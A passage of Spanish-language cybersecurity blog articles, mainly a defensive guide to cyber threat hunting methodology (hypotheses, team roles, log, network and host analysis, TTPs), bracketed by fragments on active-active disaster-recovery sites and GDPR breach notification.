el peligro de acabar desactualizado lo que implica un mayor tiempo de recuperación del servicio una vez que haya producido el incidente. Las pruebas y la operación en real controlada también introducen varios riesgos que han de ser tenidos en cuenta: - Un error en las pruebas puede afectar al sitio principal, por ejemplo que se cambie el sentido de la copia por error. Se trataría de una situación crítica: se sobrescribirían datos de real con datos no válidos. Es por esta razón, entre otras, que la copia entre sitios no sustituye a las salvaguardas tradicionales de copias de seguridad. - La operación en real puede ser no satisfactoria al disponer de menos recursos que en el sitio principal. Además, es normal que siempre se produzcan situaciones no previstas. Aun así, debe considerarse como un buen entrenamiento y servirá para actualizar y perfeccionar todos los procedimientos y procesos definidos en el plan de negocio. ## Evolución del site : Sitio Activo-Activo La evolución natural de un hotsite es un sitio ACTIVO-ACTIVO. Con esta estrategia, la organización dispondrá de dos o más sitios y prestará sus servicios de forma distribuida. No se distingue entre sitio principal y de respaldo, el cliente no sabrá que a qué sitio se está conectando, sólo que se le está prestando un servicio. Esta modalidad queda reservada a procesos muy críticos donde se considera que no puede haber cortes de servicio y el RTO es prácticamente cero. De igual manera, el RPO es cercano a cero, ya que se considera que no se puede perder ninguna información. Por ejemplo, estos requerimientos pueden aplicarse a la banca, que deben tener siempre sus servicios activos y no se pueden perder transacciones ya realizadas El principal inconveniente de estos sistemas es el económico, no sólo porque los sitios serán clones completos unos de otros, sino porque los productos tecnológicos, sobre todo el software, que soportan esta funcionalidad tienen un alto precio. El segundo gran inconveniente es la complejidad técnica, lo que se traduce que la gestión y mantenimiento la lleven especialistas muy cercanos a los fabricantes, lo que se traduce en mayor gasto. También es importante el cambio de filosofía que implica en todos los niveles del negocio, lo que aumenta la complejidad de su implantación. Aun así, debido a la cada vez mayor dependencia tecnológica de las organizaciones, la tendencia de los próximos años es que muchas organizaciones adopten este modelo. --- # Métodos de búsqueda de amenazas de ciberseguridad URL: https://ciberseguridad.blog/metodos-de-busqueda-de-amenazas-de-ciberseguridad/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-02-28 Actualizado: 2026-10-08 Tema: Operaciones de Seguridad > Al realizar la búsqueda de ciberamenazas deliberada e iterativa, las organizaciones mantienen un estado de preparación más alto. ¡CONOCE LOS MÉTODOS! Los profesionales de seguridad de la información comúnmente indican que las organizaciones no pueden evitar el 100% de todos los ciberataques. Por esta razón, se anima a las organizaciones a practicar la defensa y lo que ahora está muy de moda, un blue team , de modo que si cualquier medida de seguridad falla, otra reducirá la exposición y mitigará el impacto. Sin embargo, a pesar de invertir innumerables sumas de dinero, mano de obra y tiempo para desarrollar y mantener una sólida infraestructura de seguridad, se tienen dificultades para identificar y responder a las intrusiones de ciberseguridad de manera oportuna. Los equipos de Cyber Threat Hunt han surgido recientemente como un activo de defensa proactivo capaz de detectar y responder metódicamente a las amenazas persistentes avanzadas que evaden las soluciones de seguridad basadas en firmas o reglas tradicionales. Hoy os traigo una serie de prácticas para planificar y llevar a cabo operaciones de búsqueda de ciberamenazas en toda la empresa. Hay tres hechos absolutos con respecto a la seguridad de la información: 1. Una organización no puede prevenir todos los ataques 2. La red de una organización se verá comprometida 3. No existe la seguridad 100% Esta declaración refleja, que a pesar de invertir abrumadoras cantidades de recursos para desarrollar, mantener y mejorar la seguridad de la información de nuestra organización, inevitablemente seremos víctimas de intrusiones de ciberseguridad. No se trata de quitar peso a la importancia de mantener una arquitectura robusta de seguridad de la información, sino de resaltar que las soluciones de seguridad tradicionales basadas en firmas no son suficientes para identificar y responder a las intrusiones realizadas por amenazas persistentes avanzadas. > De promedio, se requieren 205 días para que una organización encuentre un intruso en los sistemas" (Sqrrl Whitepaper, 2016). La realidad es que las organizaciones no pueden permitirse esperar tanto tiempo. En una era donde las intrusiones de ciberseguridad ocurren en minutos, la seguridad de una organización depende de una rápida identificación y acciones de respuesta. Por ello, ¿cómo puede una organización con procesos sólidos de seguridad de la información mejorar las capacidades para identificar "adversarios avanzados" en los sistemas y red? La respuesta la encontramos en que recientemente, las organizaciones han comenzado a buscar proactivamente usuarios avanzados en las redes a través de un proceso conocido como Cyber Threat Hunting. > Cyber Threat Hunting es "enfocado e iterativo para buscar, identificar y comprender a los adversarios internos (Lee & Lee, 2016). Si bien las soluciones de seguridad tradicionales dependen de reglas y algoritmos preestablecidos, Threat Hunting "enfrenta a los defensores humanos contra los adversarios humanos". La búsqueda de amenazas se basa en la premisa de que las organizaciones no tienen que esperar una alerta automática antes de responder a una amenaza. La caza de amenazas reconoce que las intrusiones giran en torno a las amenazas humanas, y por esa razón, se necesita un ser humano para comprender y responder dinámicamente a indicadores sutiles de compromiso. Cazadores de amenazas logran esto mediante el análisis de grandes cantidades de fuentes de datos dispares con el fin de hacer inferencias y correlaciones que en última instancia conduzcan a la identificación de los adversarios avanzados, que de lo contrario es probable que permanezcan sin ser detectados dentro de nuestros sistemas. Según algunas encuestas “casi el 86% de las organizaciones están involucradas en la caza de amenazas hoy en día, aunque de manera informal, ya que más del 40% no tienen un programa formal de caza de amenazas. Además, de que las organizaciones que realizan caza de amenazas, "menos del 3% siguen una metodología formal, publicada y externa". Estas cifras indican que las organizaciones entienden el valor ofrecido por Threat Hunters, pero que, sin embargo, están en una fase muy poco madura, integrando la caza de amenazas como una capacidad formal dentro del programa de seguridad de la información. > Sin una metodología probada, verificable y repetible, la caza de amenazas se vuelve mucho menos efectiva y consistente. ## Metodología de caza de amenazas Sqrrl Security Analytics Company (Recientemente adquirida por Amazon por su potencial) proporciona un amplio marco para realizar operaciones de búsqueda de amenazas. Este marco incluye cuatro pasos específicos que se realizan cíclicamente (Sqrrl Whitepaper, 2016): 1. Crea una Hipótesis 2. Investigar a través de Herramientas y Técnicas 3. Descubre nuevos patrones y tácticas, técnicas y procedimientos (TTP) 4. Informar y enriquecer los análisis Estos pasos describen la esencia de la realización de operaciones de búsqueda de amenazas de ciberseguridad, sin embargo, los detalles específicos tales como la planificación, implementación y TTP específicos se dejan por determinar a la organización. A lo largo del Post ampliaremos el marco de Sqrrl Threat Hunting indicado (Ya que se nos acabó el chollo con la adquisición por parte de Amazon) , intentado ofrecer orientación específica sobre la realización de operaciones de búsqueda de amenazas de ciberseguridad. La siguiente lista muestra esta metodología con tareas específicas que deben realizarse al realizar operaciones de búsqueda de amenazas. Crear Hipótesis - Evaluar amenazas y vulnerabilidades - Formular hipótesis - Análisis de registro Investigar a través de herramientas y técnicas - Análisis de red - Análisis de host Descubrir nuevos patrones y TTPs - Descubrimiento y respuesta de intrusión - Análisis de árbol de ataque - Desarrollar técnicas automatizadas de búsqueda Informar y enriquecer análisis - Generar inteligencia de amenaza - Mejora continua de seguridad ## Prerrequisitos para la caza de amenazas La búsqueda de amenazas de ciberseguridad es una práctica avanzada que requiere una inversión importante de personal, equipo y tiempo. > Llevar la caza de amenazas a la madurez requiere una postura de seguridad que incluya las herramientas, las personas, los procesos y la aceptación de los responsables de la toma de decisiones que permiten a los defensores cazar (Lee & Lee, 2016). Las políticas y prácticas de seguridad fundamentales deberían establecerse exhaustivamente y seguirse de manera rutinaria antes de adoptar la caza de ciberamenazas. Además, los altos directivos deben comprender el valor que la búsqueda de amenazas aporta a una organización y extender su apoyo al programa. Antes de que una organización se comprometa con la caza de ciberamenazas, es necesario evaluar el personal disponible, los activos de seguridad y la madurez de la seguridad de la información. ### Personal para la caza de amenazas de ciberseguridad Las organizaciones deben evaluar a su personal y determinar cómo pueden asignar personal a la caza de amenazas de ciberseguridad. Solo el 28% de las organizaciones tienen un programa de caza de amenazas con personal asignado y dedicado en esclusiva. En algunas organizaciones existe personal de áreas tales como Equipos de Respuesta a Incidentes de Seguridad Informática o Centros de Operaciones de Seguridad pero no dedicados en exclusiva. Las organizaciones deben planificar en torno a un marco de capacidades y aplicarlo en función del tamaño de su red y los números y la experiencia del personal. En términos generales, los equipos de caza de amenazas se pueden caracterizar por cuatro roles clave con conjuntos de habilidades como apoyo y conocimientos complementarios: 1. Supervisión El rol de supervisión sirve como el nodo primario del comando de busqueda de amenazas y control, responsable de la planificación y ejecución de las operaciones de búsqueda de amenazas. Este rol se relaciona con el liderazgo, lleva a cabo la planificación de la misión y prioriza y sincroniza las tareas de los cazadores de amenazas subordinados o curritos. 1. Host Hunter Los cazadores de host examinan los sistemas de información y endpoints en busca de indicadores de compromiso. Los cazadores anfitriones se beneficiarán de equipos con experiencia y habilidades diversas en áreas tales como análisis de intrusión de host, administración de sistemas, respuesta a incidentes y análisis de malware. 1. Cazadores de red Los cazadores de red es la contraparte basada en la red de Host Hunters. Los Network Hunters se centran en examinar la actividad de la red a través de flujo de red, análisis de paquetes y registros de dispositivos de red. El cazador de red tendrá experiencia en análisis de intrusiones de red, administración de dispositivos de red, respuesta a incidentes y Network IDS / IPS. 1. Analista de inteligencia de amenazas El Analista de inteligencia de amenazas consumirá y generará inteligencia de amenazas para impulsar las operaciones de búsqueda. Los analistas de inteligencia de amenazas son fundamentales para el éxito de una operación de búsqueda de amenazas. En esencia, el Analista de Inteligencia de Amenazas examinará la inteligencia de amenazas de fuentes privadas y públicas e identificará amenazas que son relevantes para la organización. Esta información se suministrará a los cazadores de amenazas de ciberseguridad para centrar los esfuerzos y aumentar la probabilidad de identificar intrusos en la red. Durante las operaciones de búsqueda de amenazas, el Threat Intelligence Analyst rastreará y correlacionará los indicadores de compromiso encontrados por el personal de analisis de Host y Network Hunt. También consolidarán los resultados de las búsquedas y producir un producto coherente que documente los resultados del equipo de búsqueda de amenazas y al mismo tiempo enriquezca el análisis de inteligencia de amenaza existente. Un problema al que se enfrentan los nuevos equipos de búsqueda de amenazas es que el personal se retira de puestos existentes, como TI / seguridad o respuesta a incidentes. Para obtener el mayor rendimiento de la inversión, las organizaciones deben utilizar personal cuya principal responsabilidad es la caza de amenazas. Si bien esto requiere una mayor inversión de la organización, el personal dedicado se asegura de que las operaciones de búsqueda de amenazas se ejecuten de manera rutinaria con una calidad constante. Además, la búsqueda de amenazas es una actividad que se vuelve más efectiva con el tiempo a medida que los cazadores de amenazas obtienen una mayor percepción e intuición con respecto a las actividades en la red. Las organizaciones deben evitar asignar amenazas a otros miembros del personal de TI o de seguridad ya que "estos defensores agregan más valor cuando están obsesionados con amenazas reales y no se limitan a responder alertas o problemas de mantenimiento de la red como parches de vulnerabilidades. ### Activos y capacidades de seguridad de la información Las organizaciones deben asegurarse de contar con activos de seguridad adecuados para respaldar la búsqueda de amenazas. Los cazadores necesitan los datos que les permitan pivotar desde datos individuales en enlaces y correlaciones que finalmente revelarán la amenaza concreta. La búsqueda exitosa de amenazas requiere una gran variedad de herramientas y sensores para recopilar, agregar y analizar datos en busca de indicadores de compromiso. La recopilación de datos debe ampliarse para incluir tantas fuentes de datos como sea posible, desde netflow a registros DNS, además de fuentes de enriquecimiento de datos como la inteligencia de amenazas. El éxito de la búsqueda de amenazas es proporcional a la cantidad de datos que los cazadores de amenazas pueden aprovechar para perseguir a los adversarios, así como el acceso que se les brinda. Los cazadores de amenazas requieren grandes cantidades de información derivada de los registros, sensores, etc. y también requieren acceso sin inhibiciones para examinar los sistemas en busca de indicadores de compromiso. Como mínimo, los Threat Hunters necesita plataformas que faciliten el registro centralizado, la supervisión de la actividad de la red, la protección del end point, la recopilación y agregación de datos. ### Madurez organizacional Para que los cazadores de amenazas sean efectivos, tienen que dedicarse a la caza de amenazas regularmente. Necesitan llegar al punto en que tengan las habilidades y la capacidad para lanzar cacerías de forma automática y de forma regular, sin esperar primero a ver un IOC. Este estado final requiere un programa maduro de seguridad de la información. Para evaluar la madurez, las organizaciones deben examinar los Controles de Seguridad Críticos para una Defensa Cibernética Efectiva (Center for Internet Security, 2015). Critical Security Controls ofrece una lista completa de las tareas que se deben realizar para crear un programa de seguridad de la información robusto y eficaz. Una vez que estas tareas se ejecutan de manera rutinaria y efectiva, las organizaciones pueden considerar agregar la "caza de amenazas" como una capacidad adicional para mejorar aún más la seguridad. Controles de seguridad críticos de CIS para una defensa cibernética efectiva: CSC 1: Inventario de dispositivos autorizados y no autorizados CSC 2: Inventario de software autorizado y no autorizado CSC 3: Configuraciones seguras para hardware y software en laptops, estaciones de trabajo y servidores de dispositivos móviles CSC 4: Evaluación continua de la vulnerabilidad y remediación CSC 5: Uso controlado de privilegios administrativos CSC 6: Mantenimiento, monitoreo y análisis de registros de auditoría CSC 7: Protecciones de correo electrónico y navegador web CSC 8: Defensas de malware CSC 9: Limitación y control de puertos de red, protocolos y servicios CSC 10: Capacidad de recuperación de datos CSC 11: Configuraciones seguras para dispositivos de red como routers , firewalls y switchs CSC 12: Defensa de "límites" CSC 13: Protección de Datos CSC 14: Acceso controlado basado en la necesidad CSC 15: Control de acceso inalámbrico CSC 16: Control y monitorización de cuenta CSC 17: Evaluación de habilidades de seguridad y capacitación adecuada para llenar vacíos no seguros CSC 18: Seguridad del software de la aplicación CSC 19: Respuesta y manejo de incidentes CSC 20: Pruebas de penetración y ejercicios de red team ## Planificación de operaciones de caza de amenazas La preparación adecuada es esencial para el éxito de cualquier operación. La búsqueda exitosa de amenazas primero depende de la comprensión completa del entorno operativo. Los cazadores de amenazas necesitan tener un conocimiento profundo de los activos autorizados, las configuraciones y los datos críticos ubicados en su red. Los cazadores de amenazas necesitan contar con procesos para garantizar la adquisición y preservación de las líneas de base que documenten las configuraciones y cambios del sistema. Las líneas de base actuales e históricas sirven como un medio para monitorear y comparar los cambios a lo largo del tiempo. Los cazadores de amenazas necesitan automatizar la recopilación y el almacenamiento de esta información, preferentemente en una base de datos para facilitar las consultas y la agregación de datos (Normalmente mediante un SIEM o similar). Finalmente, los cazadores de amenazas deben asegurarse de que la directiva entienda y apruebe el programa de búsqueda. Esto asegurará que las actividades de búsqueda cuenten con el respaldo que requieren y que estén en sintonía con los objetivos y prioridades de la seguridad de la organización. ### Análisis de la misión La caza de amenazas es un proceso impulsado por analistas que está destinado a abordar problemas fuera de lo que una sola alerta o indicador puede revelar. Las Operaciones de Caza de Amenazas deben estar precedidas por un análisis de amenazas. Para que un adversario sea considerado una amenaza, debe tener tres cosas: 1. Intención 2. Capacidad 3. Oportunidad de causar daño La caza de amenazas se lleva a cabo sobre la base de que las amenazas de ciberseguridad son fundamentalmente amenazas humanas. La caza efectiva de amenazas implica comprender la amenaza humana. Las Operaciones de Caza de Amenazas deben ir precedidas de una revisión de inteligencia de amenazas, ya sea que eso signifique examinar datos relacionados con incumplimientos / incidentes históricos, revisar registros y alertas o examinar inteligencia de código abierto para amenazas específicas de la organización. Esta información se usa para enfocar a los cazadores de amenazas y finalmente darles la dirección necesaria para cazar a los adversarios que ya están dentro de la red. ### Creando una Hipótesis Transiciones de inteligencia de amenaza como característica definitoria de la caza de amenazas: una hipótesis. Simplemente hablando, la caza de amenazas comienza con una pregunta: ¿qué amenazas pueden existir en la organización? ¿Cómo se infiltraría el adversario en la organización? ¿Cuáles serían los objetivos? Estas preguntas permiten a los Threat Hunters desarrollar una hipótesis específica y cuantificable basada en la comprensión de la amenaza que en última instancia impulsará la operación de búsqueda. Para que una hipótesis sea efectiva, debe ser comprobable. Una hipótesis de ejemplo podría indicar que la administración ejecutiva tiene un riesgo elevado de compromiso por parte de los actores patrocinados por el estado que buscan información sobre secretos comerciales. Los cazadores de amenazas podrían luego evaluar posibles vectores de amenaza como spear phishing. Ver el vídeo en YouTube El phishing, como acción líder de Ciberespionage, ofrece una serie de ventajas, el tiempo de compromiso puede ser extremadamente rápido y los atacantes pueden atacar a personas específicas. Los cazadores de Amenazas podrían identificar puntos de apoyo, puntos de pivote y credenciales de usuario potenciales que podrían verse comprometidos después de la intrusión inicial. Esta información culmina al proporcionar a los cazadores de amenazas personas, sistemas y técnicas clave que los adversarios probablemente exploten para completar sus objetivos. El resultado final es que los cazadores de amenazas tienen orientación y dirección específicas para realizar de manera eficiente las operaciones de búsqueda de amenazas. ## Investigar a través de herramientas y técnicas Con una hipótesis derivada de la inteligencia de amenazas y los riesgos, el Threat Hunters procede a resolver sus hipótesis invirtiendo a través de herramientas y técnicas. Las hipótesis se investigan a través de diversas herramientas y técnicas, incluido el análisis de datos vinculados y visualizaciones. Las herramientas eficaces aprovecharán las técnicas de análisis de datos en crudo y vinculados, como visualizaciones, análisis estadísticos o aprendizaje automático (Machine Learning) para fusionar conjuntos de datos de ciberseguridad dispares. Para enfatizar las prácticas escalables, esta metodología desglosa las operaciones de búsqueda de amenazas en tres técnicas clave que se realizan concurrentemente y sinérgicamente: 1. Análisis de registro 2. Análisis de red 3. Análisis de host ### Análisis de logs El análisis de registros es una tarea realizada tanto por el host como por los cazadores de redes, aunque con respecto a sus áreas de enfoque. El análisis de registro efectivo ofrece a los Threat Hunters una comprensión detallada de los eventos que ocurren en su red y en sus sistemas. La Guía de NIST para la administración de registros de seguridad informática recomienda recopilar un conjunto diverso de registros como firewalls, enrutadores, IDS / IPS, etc. Diversas colecciones de registros permiten a los cazadores de amenazas analizar de manera holística la actividad en la red y correlacionar y visualizar indicadores sutiles de compromiso. El análisis de registros a menudo sirve como punto de partida para las investigaciones de seguimiento por parte de los Network Hunters y Host Hunters. El desafío con el análisis de registros implica equilibrar la generación de registros, la cantidad y las limitaciones de retención. Sin embargo, una comprensión precisa de las amenazas cibernéticas debe priorizar el tipo, la cantidad y la rotación de los registros recopilados. Independientemente de los requisitos organizativos, para que un adversario mantenga un acceso persistente a un sistema después del reinicio, inevitablemente tiene que modificar o agregar cuentas de usuario / grupo, procesos y puertos de escucha. Esto proporciona una oportunidad para que los cazadores de amenazas identifiquen eficientemente los indicadores de compromiso al enfocarse en tres áreas clave: 1. Integridad del registro 2. Acceso a objetos y cambios en los procesos 3. Puertos de escucha Los ciberdelincuentes avanzados, comúnmente cubren sus pistas al modificar o eliminar entradas de registros. La monitorización de la integridad de los registros puede ayudar a identificar rápidamente a los actores amenazados en la red. Los cazadores de amenazas deben analizar las instancias donde se purgan todos los registros y donde los registros locales difieren de las utilidades de registro centralizadas como Syslog, Splunk o ELK. Los Threat Hunters pueden comparar los registros de los sistemas de destino con los de la solución centralizada y verificar que los datos no se hayan alterado o purgado por completo. Quizás el factor más importante en el análisis de logs implica monitorizar la actividad y el comportamiento de usuarios y grupos privilegiados. > El 63% de las violaciones de datos confirmadas involucraron contraseñas débiles, predeterminadas o robadas (Verizon, 2016) Como el acceso de administradores es a menudo un requisito previo para seguir con la explotación del adversario, los cazadores de amenazas deben supervisar y verificar de cerca el acceso de administradores. Los cazadores de Amenazas también deberían expandir su búsqueda a usuarios de alto valor, como ejecutivos de nivel C, personal de TI / IA, y recursos financieros y humanos, que probablemente sean objetivos de adversarios avanzados. Las amenazas avanzadas son fundamentalmente impulsadas por la información. > El 90% de las infracciones de Ciberespionage capturan secretos comerciales o información patentada (Verizon, 2016). Junto con la supervisión de usuarios y grupos con privilegios, los Threat Hunters necesita monitorizar de cerca los intentos de acceso a los datos y recursos críticos. Los usuarios casuales generalmente no tienen una cantidad significativa de intentos de acceso fallidos y tienen un comportamiento de acceso relativamente predecible. Los cazadores de amenazas deben utilizar los registros para analizar el número de objetos a los que se accede, la frecuencia de acceso y el éxito o las fallas de acceso. Esto permite a los cazadores de amenazas afinar efectivamente las anomalías que pueden conducir a la identificación de indicadores adicionales que pueden estar vinculados a adversarios avanzados. Se requiere acceso persistente a los sistemas para la explotación sostenida de los activos de información de una organización. Si bien las amenazas avanzadas pueden ofuscar las actividades a través de medios como los rootkits, tienen que mantener inherentemente el acceso a los objetivos para continuar operando. Esto requiere implícitamente que los adversarios modifiquen los puertos y procesos de escucha de un sistema. El registro puede ser útil para identificar instancias de nuevos procesos y puertos abiertos, particularmente cuando se examinan procesos que fueron iniciados por usuarios con privilegios. ### Análisis de red El enfoque de los Network Threat Hunters es la monitorización y análisis de la actividad de la red. El análisis de red plantea desafíos debido al cifrado, el ancho de banda, el almacenamiento y las limitaciones de procesamiento, y un adversario cada vez más astuto. A pesar de estas limitaciones, el análisis de red ofrece a los Threat Hunters un medio escalable para identificar y reaccionar ante adversarios avanzados en la red. Cuando se utilizan junto con el análisis de registros y de host, los Threat Hunters puede lograr un examen integral y completo de los sistemas para detectar la presencia del adversario. Los cazadores de amenazas de red analizan un conjunto diverso de actividades de red, como capturas de paquetes y flujo de red, alertas IDS / IPS de red y registros de dispositivos de red. Aunque los requisitos organizativos dictarán las fuentes específicas de información de red, los cazadores de amenazas deberían centrar su análisis en examinar cuatro características clave de la red: 1. El número de conexiones de red salientes 2. La duración de las conexiones 3. La cantidad de datos intercambiados 4. La frecuencia de las conexiones Cuando un host se ve comprometido, estas características casi siempre se desviarán de la actividad normal del usuario de una manera significativa. Usando capacidades tales como análisis de flujo de red, análisis de protocolo y análisis estadístico, los Threat Hunters pueden visualizar e identificar hosts anómalos en la red en función de la forma en que se comunican. Esto puede servir como un trampolín para permitir que los cazadores de Amenazas identifiquen los hosts comprometidos y por extensión los adversarios en su red. Las direcciones IP sospechosas pueden correlacionarse con los hallazgos de los Host Threat Hunters y de la red en general. ### Análisis de host Los Host Threat Hunters se enfocan en examinar el comportamiento y la configuración de los sistemas host. Esto se logra comparando las configuraciones con las líneas base establecidas, revisando las alertas de soluciones de seguridad como antivirus y host IDS / IPS, y verificando la integridad del sistema de archivos. Los cazadores de Amenazas verifican continuamente el estado de estos conjuntos de datos y los comparan con los informes históricos, preferiblemente de una manera que admita la visualización de datos. Como se indica en la sección Análisis de registro, los adversarios inevitablemente modifican los usuarios / grupos de un sistema, los procesos y las conexiones de red. Los Host Threat Hunters deben centrarse en estas áreas comparando las configuraciones actuales con líneas de base y normas establecidas (Bastionado de los sistemas, por ejemplo). Junto con las comparaciones históricas, los Host Threat Hunters deben monitorizar de cerca y analizar el estado y las actividades de los usuarios y grupos privilegiados. Por ejemplo, los Host Threat Hunters deben observar los períodos de inicio de sesión de los usuarios con privilegios y buscar anomalías que se desvíen del comportamiento tradicional del usuario. ## Descubrir nuevos patrones y TTPs Los equipos de Threat Hunt pueden inclinarse a enfocar sus esfuerzos en la búsqueda de indicadores de compromiso como hash maliciosos, direcciones IP y exploits del sistema de archivos. Si bien esto puede dar como resultado algunas victorias rápidas, es trivial para los adversarios avanzados modificar estos indicadores. En su lugar, los cazadores de Amenazas deberían concentrarse en comprender las TTP globales que se producen en el indicador a través de un proceso conocido como análisis de árbol de ataque. El análisis del árbol de ataque implica modelar qué pasos puede realizar un adversario para violar los sistemas de la organización. Modelos como la cadena de muerte cibernética de Lockheed Martin o el ciclo de vida de ataque de Mandiant pueden ser útiles para determinar en qué parte del árbol de ataque se produjeron las actividades de los adversarios. Tecnica de ataque de hackers Remediación Tecnica del adversario Tácticas y procedimientos Reconocimiento Escaneo de puertos, recolección de direcciones de correo electrónico, etc. Explotación Aprovechamiento de acoplamiento con puerta trasera en carga útil liberable Entrega Entregando paquete armado al correo electrónico de la víctima, web, USB, etc. Entregando paquete armado al correo electrónico de la víctima, web, USB, etc. Explotar una vulnerabilidad para ejecutar código en la víctima sistema Instalación Instalación de malware en el activo Command and Control Canal de comando para la manipulación remota de la víctima Acciones en objetivos Los intrusos logran su objetivo original Al determinar dónde encaja un indicador dentro del árbol de ataque, ños cazadores pueden identificar el lenguaje de información y luego intentar resolverlas a través de técnicas de investigación adicionales. A medida que los cazadores de Amenazas descubren el árbol de ataque del adversario, logran una visión holística de los TTP de los adversarios, lo que aumenta la continuación de las cacerías y mejora la postura general de seguridad de la información de la organización. Los cazadores de amenazas reciben el mayor rendimiento de sus esfuerzos centrándose en descubriendo adversarios mediante TTPs. > Las TTP reflejan el comportamiento de un atacante, y el comportamiento requiere de un tiempo significativo e inversión monetaria para modificarse. (Sqrrl Blog, 2015). En la práctica, esto se traduce en técnicas de detección y combate como los ataques Pass-the-Hash en lugar de descubrir incidentes sobre los adversarios que llevan a cabo esos ataques. Al enfocarse en detectar y responder a los TTPs de los adversarios, los cazadores de Amenazas obtienen una ventaja operando directamente en eñ comportamientos de los adversarios, en lugar de em el conjunto de herramientas de los mismos. Descubrir nuevos patrones y TTPs permite a los cazadores de amenazas evolucionar los procesos de seguridad de la información, así como el programa de búsqueda de amenazas en sí. Como defensores, catalogar las observaciones sobre los TTPs de los atacantes, puntos débiles en las defensas y cualquier obstrucción en el flujo de trabajo de investigación, pudiendo agilizar los tiempos de respuesta y compensación. A medida que los cazadores de amenazas continúan descubriendo nuevos TTPs, los resultados retroalimentan sus procesos y sistemas existentes, refinando la detección, acciones de respuesta y eficiencia. Cuando se incorpora con la visualización de datos, la inteligencia de amenazas y las técnicas de aprendizaje automático, permite al proceso de los cazadores de amenazas estar un paso por delante de los atacantes. ## Informar y enriquecer los análisis Una característica definitoria de CyberThreat Hunting es que la caza exitosa es la base para informar y enriquecer el análisis automatizado. Como los cazadores de Amenazas descubren métodos efectivos para identificar TTPs de los adversarios durante las cacerías, deberían desarrollar soluciones automatizadas para contrarrestar los TTP en toda la red de la organización. Hay muchas maneras en que esto se puede hacer, incluido el desarrollo de búsqueda guardada para ejecutar regularmente, creando nuevos análisis utilizando herramientas como Apache Spark, R, o Python, o incluso al proporcionar retroalimentación a un algoritmo de aprendizaje automático supervisado confirmando que un patrón identificado es malicioso. Esto permite a los cazadores de Amenazas continuar realizando operaciones para descubrir nuevos adversarios de TTPs. Los cazadores de Amenazas también deberían contribuir al cuerpo de inteligencia de amenaza. Como amenaza los "exámenes" de los cazadores revelan nuevas TTP adversas, necesitando alimentar los hallazgos en sistemas de monitorización existentes. A medida que este proceso continúa, los cazadores de Amenazas maduran más allá de la caza genérica impulsada por hipótesis a cacerías impulsadas por inteligencia de amenazas. Esto resulta en cacerías más eficientes y una mayor seguridad organizacional. ## Conclusión Las soluciones defensivas tradicionales basadas en reglas no son suficientes para permitir a los defensores identificar rápidamente y responder a las amenazas persistentes avanzadas. Mientras que las defensas tradicionales en las prácticas de profundidad son importantes para salvaguardar la red, no abordan el problema de adversarios latentes que permanecen en la red de nuestra organización. El Cyber Threat Hunting tiene como objetivo abordar el problema de la identificación de adversarios avanzados mediante la adopción de ejemplos preventivos y una metodología deliberada de búsqueda rutinaria de intrusión en la red. > El 40% de una encuesta de Eric Cole no tienen una metodología formal de caza de amenazas. Los cuatro roles definidos anteriormente se desarrollan en un equipo funcional de Threat Hunter después de evaluar cuidadosamente los activos existentes y la madurez de la organización. Fundamentalmente, los cazadores de amenazas requieren grandes cantidades de información para aprovechar analíticas, visualizaciones y aprendizaje automático para descubrir amenazas avanzadas en la red. Los cazadores de amenazas comienzan a operar después de realizar dicho análisis. Empezando por varias preguntas y con una hipótesis: ¿dónde estaría un adversario dentro de la red? ¿Cuál sería su objetivo? Esta hipótesis debe basarse en el análisis de riesgos, inteligencia de amenazas, y las prioridades organizacionales, con una hipótesis documentada. Tras ello, los Threat Hunters comienzan la caza mediante la investigación a través de herramientas y técnicas. Los cuatro roles definidos anteriormente se desarrollan en un equipo funcional de Threat Hunter después de evaluar cuidadosamente los activos existentes y la madurez de la organización. Fundamentalmente, los cazadores de amenazas requieren grandes cantidades de información para aprovechar analíticas, visualizaciones y aprendizaje automático para descubrir amenazas avanzadas en la red. Los cazadores de amenazas comienzan a operar después de realizar dicho análisis. Empezando por varias preguntas y con una hipótesis: ¿dónde estaría un adversario dentro de la red? ¿Cuál sería su objetivo? Esta hipótesis debe basarse en el análisis de riesgos, inteligencia de amenazas, y las prioridades organizacionales, con una hipótesis documentada. Tras ello, los Threat Hunters comienzan la caza mediante la investigación a través de herramientas y técnicas. Durante esta fase, los Threat Hunters dividen las responsabilidades entre Host y Network Threat Hunters, y un analista de inteligencia de amenazas. Como estos cazadores de amenazas operan, se enfocan en identificar adversarios y descubrir nuevos patrones y TTPs. Sus hallazgos se retroalimentan en el ciclo de búsqueda de amenazas, que tiene el efecto de informar y enriquecer. A medida que los cazadores de Amenazas descubren técnicas exitosas, crean soluciones automatizadas que se pueden implementar en toda la empresa. El ciclo entonces cierra el círculo, ya que el resultado de la búsqueda anterior informa y enriquece al siguiente. La caza de amenazas puede ser un método viable para reducir el tiempo que se tarda en identificar los adversarios en la red. Al realizar la búsqueda de amenazas deliberada e iterativa, las organizaciones mantienen un estado de preparación más alto y potencialmente mejoran drásticamente su postura de seguridad de la información. --- # Agencias de marketing digital notificarán violaciones de seguridad URL: https://ciberseguridad.blog/agencias-de-marketing-digital-notificaran-violaciones-de-seguridad/ Tipo: Artículo Autor: Esténtor Inbound Marketing Publicado: 2018-02-20 Actualizado: 2026-09-29 Tema: Compliance > Los próximos cambios legales en el tratamiento de datos son un desafío para cualquier agencia de marketing online [https://www.estentor.es/]. En Esténtor nos tomamos muy en serio la protección de datos, por ello nos esforzamos en devolver a nuestros clientes la confianza que han depositado en nosotros ofreciéndoles a nuestros clientes el más alto nivel de seguridad. Internet ha cambiado nuestras vidas. Con la llegada del comercio electrónico, las redes sociales y los buscadores de Internet hemo Los próximos cambios legales en el tratamiento de datos son un desafío para cualquier agencia de marketing online. En Esténtor nos tomamos muy en serio la protección de datos, por ello nos esforzamos en devolver a nuestros clientes la confianza que han depositado en nosotros ofreciéndoles a nuestros clientes el más alto nivel de seguridad. Internet ha cambiado nuestras vidas. Con la llegada del comercio electrónico, las redes sociales y los buscadores de Internet hemos aprendido a obtener información y a relacionarnos con las marcas y con otras personas de una manera radicalmente distinta a la que estábamos acostumbrados hasta hace bien poco. Pero de igual manera que hemos cambiado nuestra forma de interactuar con el mundo, también han variado los riesgos que amenazan nuestros datos. Como sabreis, los ladrones ya no visten de negro, sino que se esconden tras una pantalla y se hacen llamar hackers. Desgraciadamente, la ciberdelincuencia está al orden del día y hay que protegerse de ello. Por suerte para ti en ciberseguridad.blog podrás estar al tanto de todas las novedades. Y como creemos que es importante que los usuarios puedan dormir tranquilos sabiendo en todo momento el estado en el que se encuentran sus datos, hoy hemos venido a hablar de uno de los grandes cambios que introducirá el nuevo Reglamento europeo en materia de protección 